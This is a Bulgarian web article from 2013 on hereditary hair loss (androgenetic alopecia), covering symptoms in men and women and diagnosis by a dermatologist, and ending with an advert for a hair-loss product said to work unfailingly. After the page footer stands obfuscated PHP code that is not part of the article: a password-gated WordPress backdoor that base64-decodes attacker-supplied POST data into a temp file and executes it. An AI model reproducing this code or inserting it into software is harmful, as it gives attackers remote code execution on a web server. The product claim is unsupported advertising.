Наследствен косопад | Косопад

Наследствен косопад

андрогенна алопецияНай – честата причина за загуба на коса е наследственият косопад, известен още като андрогенна алопеция. Обуславя се от генетични фактори, които могат да бъдат унаследени от майката, бащата или от двамата (тогава рискът да развиете и вие самите е много голям).

Симптоми на наследствен косопад

Признаците за развитие на андрогенна алопеция при мъжете и жените са различни. При силния пол е много по – лесно да бъде установена, понеже се характеризира с постепенно олисяване на цели зони. Често започва от челото или от темето. При първия случай сравнително бързо косата се отдръпва във формата на буквата М, а при втория се появява оголено петно на върха на главата, което се разширява все повече.

При дамите напълно олисели петна рядко се забелязват, а при тях опадането е дифузно. Симптомите на наследствен косопад са най – вече изтъняване на косата зад бретона или по средата на скалпа.

И при двата пола е характерно, че състоянието се развива бавно и до достигане на крайния вариант могат да минат повече от 30 години. При някои индивиди започва още след навършване на пълнолетие, при други се появява чак по време на менопаузата, на 50 +.

Тестове за андрогенна алопеция

Опитният дерматолог сравнително лесно може да определи дали става въпрос за наследствен косопад или причината е друга. Ако все пак има съмнения може да прибегне до биопсия на скалпа, при която възможността за грешна диагноза е почти нулева.

Превенция на косопад

Може да използвате препарати срещу оплешивяване като „Ефект-2”, който работи безотказно при правилно третиране (повече за „Ефект-2” научете тук и поръчайте).

08. септември 2013 18:16:55 от Косопад
Категории: Косопад – Статии | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}